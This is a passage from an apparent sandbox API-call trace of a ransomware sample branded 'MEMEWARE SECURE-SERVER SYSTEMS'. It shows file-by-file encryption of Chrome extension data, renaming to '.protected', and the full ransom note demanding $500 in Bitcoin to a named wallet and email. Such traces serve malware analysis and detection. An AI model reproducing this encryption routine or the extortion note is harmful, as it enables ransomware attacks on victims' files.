(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.135] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.135] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.135] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.135] CloseHandle (hObject=0x164) returned 1 [0081.135] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0081.135] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0081.135] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl") returned 145 [0081.135] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0081.135] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0081.135] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*") returned 147 [0081.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.136] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.136] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.136] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.136] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.136] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\.") returned 147 [0081.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.136] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.136] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.136] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.136] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.136] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\..") returned 148 [0081.136] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.136] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.136] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.136] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.136] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.136] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.136] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.136] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.136] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.137] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.137] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.137] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json") returned 159 [0081.137] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.137] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29a, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.147] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29a, lpOverlapped=0x0) returned 1 [0081.147] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.147] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.147] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.147] CloseHandle (hObject=0x168) returned 1 [0081.147] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.protected") returned 169 [0081.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.protected")) returned 1 [0081.148] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.148] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.148] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\RESTORE_FILES.txt") returned 163 [0081.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.149] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.149] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.150] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.150] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.150] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.150] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.150] CloseHandle (hObject=0x164) returned 1 [0081.150] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0081.150] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0081.150] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR") returned 148 [0081.150] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0081.150] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0081.150] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*") returned 150 [0081.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.151] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.151] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\.") returned 150 [0081.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.151] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.151] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.151] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.151] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.151] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.151] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.151] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\..") returned 151 [0081.151] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.151] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.151] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.151] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.151] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.151] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.151] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.151] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.153] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.153] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0081.153] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.153] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.154] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.154] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.154] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.154] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.154] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.155] CloseHandle (hObject=0x168) returned 1 [0081.155] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.protected") returned 172 [0081.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0081.155] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.155] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.156] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 166 [0081.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.156] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.156] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.157] lstrlenA 